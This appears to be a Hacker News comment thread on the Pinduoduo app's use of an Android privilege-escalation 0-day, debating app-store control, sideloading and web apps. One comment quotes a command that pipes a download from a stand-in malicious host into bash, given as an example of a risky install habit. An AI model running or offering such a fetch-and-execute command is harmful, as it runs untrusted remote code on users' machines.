Android app from China executed 0-day exploit on millions of devices
arstechnica.com
arstechnica.com
- Hiding their app icon from launcher, but add a widget that looks the same. So if the user tries to uninstall the app, they just deleted the widget and the app remains.
- One app would install other apps from the same company in the background without user consent.
- Multiple apps will wake each other so they always stay in the background and become impossible to kill
- Requesting every permission under the sun and transmit as much info to the mothership as possible
- Secretly turning on the camera and film their users
However, these only happen on Android version. iOS version never have these issues.
So even though I am not a fan of the Apple monopoly, I am really really afraid that by allowing third party app stores and sideloading, the western apps will race to the bottom and become just like this.
("But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?)
> Hiding their app icon from launcher...
Well, apps that don't have a declared launchable (homescreen) UI don't get these icons. Granted it has been abused by spyware apps to "hide" from unsuspecting users, but you'll find these in Android's Settings app.
> One app would install other apps from the same company in the background without user consent.
I doubt installation without user consent is possible at all in Android 9+. Afaik, only Google PlayStore (or other OEM embedded stores) have permissions to silent install, as it were. And I haven't seen anyone allege PlayStore silently installing apps. See also: https://www.xda-developers.com/android-14-background-install...
> Multiple apps will wake each other so they always stay in the background and become impossible to kill
One can Force Stop an app to make sure no component (service, activity, recievers, or resolvers) can run in the background, until the user explicitly starts the app process again via the Launcher.
Android also limits background processes, tracks per-app CPU and memory use to limit it, and "caches" processes aggresively if need be (puts their threads to sleep so they aren't executing anything but could be resumed quickly).
> Requesting every permission under the sun and transmit as much info to the mothership as possible
The Trust on First Use model has been taken to the cleaners by Android apps hell bent on tracking their users. Starting Android 12 though, Android auto removes permissions granted from installed apps user hasn't interacted with.
> Secretly turning on the camera and film their users
Android 13+ has camera and mic indicators. And for earlier versions, even if inconvenient for end users to setup, there exist open source apps that continuously log cam or mic access from other apps.
None of this is perfect, mind you; but I wanted to point out that Android has been responding to growing privacy concerns: https://security.googleblog.com/2022/12/app-defense-alliance...
> Android 13+ has camera and mic indicators.
Indicators are a good step, but wouldn't it be better to disallow apps from turning on the camera without the user's explicit consent altogether?
and the only "background" way is to have a persistent/permanent notification
so far I have seen the Blokada, VPN apps and the Shazam app do this
Re: Blokada: https://twitter.com/JulianKlode/status/1613919509731225601 / https://archive.is/nasHG
Amazon's apps love to do this. If any one of {Kindle app, Amazon Shopping, Amazon Music, Prime Video, Amazon Appstore} launches, one or more of the others will launch in the background. I first noticed it on three low-resource devices. Force-stopping ones I wasn't using at the moment resulted in them relaunching in a few moments. The only solution was to not have more than one Amazon app one each low-RAM or aging-CPU device.
Google does something like this, too, but I can't as easily disperse Gmail, Play Books, Play Music (erm, YouTube Music), Google Services, and whatever else. They also seem to do it more like "O, device just woke, or wifi state change, so lets update all the things", instead of Amazon's "User asked to load Kindle into 864 MB of RAM? Better have all the other large Amazon apps check for updates, too!".
2 GB RAM? Same sudden glacial slowness and unresponsivness due to background semi-related apps running unnecessarily. 4 GB? Well, that mostly works; a moderate slowdown, but no UI freezes.
(Yes, I'm saving up for a Galaxy Tab S8+with 16 GB, but…it costs as much as a real laptop without including a keyboard. I almost miss my Palm IIIx with month-long battery.)
LineageOS further has camera/mic toggle & when apps need them we can enable them on the fly.
The security argument for the App Store has never been stronger.
> "But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?
... and nothing of value was lost.
Perhaps, for many users this is true. But I don't need or want a nanny-company telling me what I can and can't install on my devices.
(And yes, I do sideload apps -- including one I've written myself -- on my Android phone. So this isn't a theoretical "don't take my freedom" type concern.)
>> But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?
> ... and nothing of value was lost.
Couldn't agree more with that sentiment. The problem is, though, that many people will still download it from TikTok's own website or app store. Security is a collective problem: even if I manage to avoid malware, a friend or colleague -- who may have email or chat or whatever history with me -- could get hacked, and that would still leak some of my data.
Over the years I have built several very small, very specific apps, to do one thing and do it exactly the way I want it. The one that found most use (also among my friends) was my QR-code scanner, which was built in the days when the only QR-code scanners you could find were littered with ads, or paid for.
It took me less than 2 hours to wrap the google barcode SDK in an app with one view that showed the camera preview and had one toggle button.
The toggle button controlled whether a scanned QR-code would be immediately opened (through a generic intent), or whether it would be stored in the clipboard.
Super easy, works really well and I still prefer over the much slicker looking paid apps. If I had an iPhone i would have surely never have built this app, as the hassle would be too much.
But I also want a trustworthy place to get apps….
Only works on Android though because Apple deems this type of non-Apple store a threat to their profits. Fortunately there are plenty of Android devices to be had on the market which can run a free AOSP-derived distribution like LineageOS. You'll get OTA updates until the cows come home or the developers move to another device, whichever comes first. The Galaxy SIII I'm using as a "dangerous work" phone - its screen got cracked when it fell of the barn roof for the second time while I was installing solar panels but it still works fine - still gets updates, it currently runs Android 11.
The spyware game on mobile is different than laptop or desktops.
most will not go through the trouble of downloading apps directly and then installing them via developer mode. So while annoying to 0.0001 of Tech workers ... this would actually work quite well.
And chances are that nobody asks us in our ivory Tech towers. It would work so well that within less than 2 years Chinese apps could disappear like Keyser Söze (which is even faster than Huawei disappeared from the US market ;)).
100% agree. Simply don’t buy an Apple phone.
Is this really what we want?
Because if so, what is the difference between a clamped down App Store with arbitrary rules, and what China does with their Great Firewall?
With a locked down App store in America you have an option of using another device, or just using a computer, without any repercussion. With the Chinese great firewall working around it can lead to legal troubles, to put it lightly.
1/Apple is based in a country that follows the rule of law, with checks and balances, and can be sued if it disobeys the law.
2/Apple does not have police, a military, or other means to force you to act against your will.
3/Apple does not prevent you from accessing information outside the country.
4/Apple does not coerce you to say things even if they are false.
5/Apple does not torture -- sorry, I mean "re-educate" -- Muslims.
Please, don't make specious arguments comparing your inability to install some app few people need to being oppressed under the thumb of the CCP. Let's turn down the dramatic volume a little, shall we?
The CCP "great firewall" excuse is, precisely, that it will keep "bad actors" away from the homeland, or "flies" as Den Xiaoping put it. We all know what is the real reason, though.
Apple uses the same excuse: security through arbitrary content control.
As other users have said, I could go and buy an Android phone, or I could even use no phone, why not? But that's not the point. The point is, I'm not buying a device from Apple, I'm just leasing it, with certain conditions. And that should be, in my opinion, not only against the law, but widely considered unethical.
I get that you don’t like the current state of affairs, but your analogies aren’t good ones.
Ownership has never meant that you are free to do what you want with your property. You take the property as is, and sometimes there are even legal restrictions to what you can do with it. For example, I’m not allowed to build a slaughterhouse on my land.
Call it what you want. I pay a lump sum for something that doesn't technically belong to me. And, if I break their ToS, they reserve the right to disable it.
People are rightfully upset about carmakers putting common features behind a paywall. It seems appropriate that they would be too, if they were forbidden to use their car as they pleased.
> Ownership has never meant that you are free to do what you want with your property. You take the property as is, and sometimes there are even legal restrictions to what you can do with it. For example, I’m not allowed to build a slaughterhouse on my land.
This is absurd.
Of course the rule of the law forbids you from having a slaughterhouse in your land if you don't comply with regulations. The terms of the App Store are part of a contract, not a law. Contracts may be initially binding, but they may also be illegal after review, and I personally hope they are in this regard.
In other words, there is no law saying that I shall not distribute porn on the App Store, that is just Apple's prerogative.
On the other hand, if you are arguing that federal and state laws are equivalent to private contracts, then your previous point about the Great Firewall and the App Store is moot.
The physical object belongs to you, but property has never in the course of history meant "I can do whatever I want with something in my possession." Property rights are about possession and control, not necessarily about concrete objects. (That's why copyright and trademark is known as "intellectual property.") And control is rarely absolute.
> the law forbids you from having a slaughterhouse in your land if you don't comply with regulations
No, zoning regulations prohibit me from having a slaughterhouse on my land at all. Hell, I can't even build a multi-family residence on it.
> if you are arguing that federal and state laws are equivalent to private contracts
They are not, but legal enforcement is what makes contracts work - the "teeth," if you will. If everyone were free to flagrantly breach the terms of their contracts, chaos would result.
What you're asking for is for certain terms of contracts to be unlawful as contrary to public policy. And that's fine, but again, let's keep the hysterics and ludicrous comparisons to a minimum.
It's going to be an unpopular opinion but there's an awful lot of applications that are out there that are just hilariously outdated, terribly made, or is some form of malware. I mostly use mainstream apps (Google Maps, Bitwarden, Safari, Slack, Discord, Spotify, Canary, etc) and the times I do look for new apps I enjoy having the convenience of not having sift through awful apps that used to plague android market (and to a certain extent google playstore).
App Store is not perfect by any means but I think it's superior to alternatives that are out there for users like me.
You can't get an ISP without Great Firewall in China. If you try to found such an ISP you'll be in jail.
Do you see the legislation for broadcasting and say, ‘What makes that different from how you have no free speech in China?!’
We’ve already had voluntary step backs in the idea of online liberalism with Twitter having to be heavily pressured to take down ISIS propaganda. Codifying those rules for everyone is inevitable.
please stop it. I do not want my devices to become a toaster. I am a computer programmer. I would like the ability to write programs for my own personal use, and run those on my own devices THAT I PAID FOR. please stop pushing some narrative that will take this ability away from me.
Personal freedom always has personal responsibility attached. If you direct download it and it's malicious, well, that's your own problem. Probably should've thought about it better.
If you don't want to think about security, all you have to do is only install apps that are in the app store. Why should everyone else be restricted from doing whatever they want with their phones?
How about if we had laws that also made it a problem for the person/company who developed it too? Seems like they have some responsibility too.
This is not true. It’s much rarer but there’s nothing special about iOS in this regard when it comes to abusing 0-days.
This did not happen with Windows, so why would it happen with Android, that is much more restrictive in terms of permissions?
It was pretty much impossible on Symbian OS.
Edit: Replaced imgur link
Sort of like using Twitter as a URL shortener.
Do not recommend abusing this.
Rimgo is basically a frontend for imgur that you can selfhost (or use a public instance). The LibRedirect browser extension automatically replaces the imgur.com URL with the specified rimgo instance.
So for example https://imgur.com/gallery/eMKxD6t turns into https://rimgo.pussthecat.org/gallery/eMKxD6t.
It is online since 2006, does no obviously evil browser stuff, and the guy hosting it seems cool.
eg: https://imgur.com/4clqUdj.jpg (picture of a cat)
since the traffic appear to come from the main domain to them, it does to redirect back to the html page.
I'm not one to worship Google's walled garden(which is just marketing jargon), but at least that has some layer of verification and malware detection.
I still dream of a web app based future. Then we only need to security proof 1 app.
> A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.
https://lifehacker.com/great-now-the-apple-app-store-has-mal...
> Security researchers found malware in several popular App Store apps.
You are (just like me) from a different era. /s
I was trying to compile rust (for mozilla) and i was shocked to see that it connects to the internet during the build process to download crates (i presume these are some kind of libraries). Then you have js with npm and the menu is served.
Even if the web browser has a container, this can be compromised during the build process.
Once you push broad access to user data and hardware to browsers, you'll get ransomware there, too. Meanwhile, native sandboxing keeps advancing.
So no, web will not remain the safer option forever.
None that we know of. Keep in mind that not so long ago the browser did not have access to filesystem except to save files. Now the browsers have access to filesystem, camera, microfone, they can act as servers, they have access to USB devices.
I mean WTF. What kind of security is that ?
Also, it's not like people were installing this app from a random sketchy website; it appears to have been available on third-party Android app stores, which are the only option in China, since the Google Play Store isn't allowed there.
> I still dream of a web app based future.
Right there with you, but sadly, I don't think it's a realistic hope.
curl https://malicious.example.com/useful_thing | bash
and its variants?
We'll never get our one security proof app because security proof apps can't do things like rendering and file manipulation at acceptable speeds.
Downloading apps from websites is almost always a red flag in my opinion. If an app can't be in Google's app store for whatever reason, it surely can appear in another.
The only APKs I've downloaded come from Github/Gitlab because open source apps aren't always on F-Droid, and APKmirror because my phone is rooted, and I consider myself to be a power user. I'm really surprised an app like this is popular enough to get downloaded installs at all, though perhaps the Chinese app ecosystem is different enough that I simply can't understand.
I'd hate to have to resort to web apps for absolutely everything on my phone. Messengers and such need optimisations for battery usage and resources and browsers don't offer any of that. The overhead of web applications is also quite significant. Don't get me wrong, I use several web apps for small things like weather sites and a simole game here or there, but there has to be room for both or the mobile experience will get worse for everyone.
therefore I can't download Netflix from Google Play for some absolutely idiotic reason even though the stupid app works perfectly afterwards. They just hate me for wanting to sync my clipboard automatically, I'm guessing.
True, but as the GP pointed out, we only have to secure one app, and fixing a security issue in it saves you from anyone exploiting that flaw in any other app.
Sure, you can make the same argument of an OS-level flaw, but that leaves people with older devices out in the cold, as they often don't receive OS updates anymore. The browser is just an app, and as long as it supports the OS running on the older devices, you get those updates years after your device vendor stopped supporting you.
We're never going to solve all security issues (at least not until "perfect" AI starts writing our software), but I'd much rather run apps in a a browser than on the device directly, even with Android/iOS's app sandboxing tech.
From the article:
> The malicious versions of the Pinduoduo app were available in third-party markets, which users in China and elsewhere rely on because the official Google Play market is off-limits or not easy to access.
> Lookout’s forensic analysis of two Pinduoduo APK app samples released prior to March 5 ... has determined that both contain malicious code that exploits CVE-2023-20963, the Android privilege-escalation vulnerability that wouldn’t become public until March 6 and wouldn’t be patched in user devices for up to two weeks later.
> Google patched in updates that became available to end users two weeks ago.
> This privilege-escalation flaw, which was exploited prior to Google’s disclosure
> Pinduoduo's core value is "本分" (Ben Fen). It is difficult to express it perfectly in English, but it essentially means to adhere firmly to one's own duties and principles. There are several layers of meaning here:
> Be honest and trustworthy;
> Discharge our own duties and responsibilities regardless of others' conduct;
> Never take advantage of others even when we are in a position to do so;
> Self-reflect and take responsibilities when problems arise instead of blaming others.
I guess the company's app developers never got the memo.
Looks like they nailed that one.
> The source[0] has a more clear description about what is being currently exploited: In the end, the Internet vendor used the above-mentioned series of concealed hacking techniques to achieve:
Concealed installation, increase installed capacity
Counterfeit boost DAU/MAU
Users cannot uninstall
Attacking Competitor Apps
Steal user privacy data
Evasion of privacy compliance regulations
and other suspected illegal purposes.
[0] https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWswThe actual monopoly they enjoy or the remote control of my devices aren't the real solutions to this problem.
As far as I know, China is the only country that has 3rd-party Android app markets of that size because Google Play is literally not allowed there. So I don't think this would be a significant story anywhere else in the world.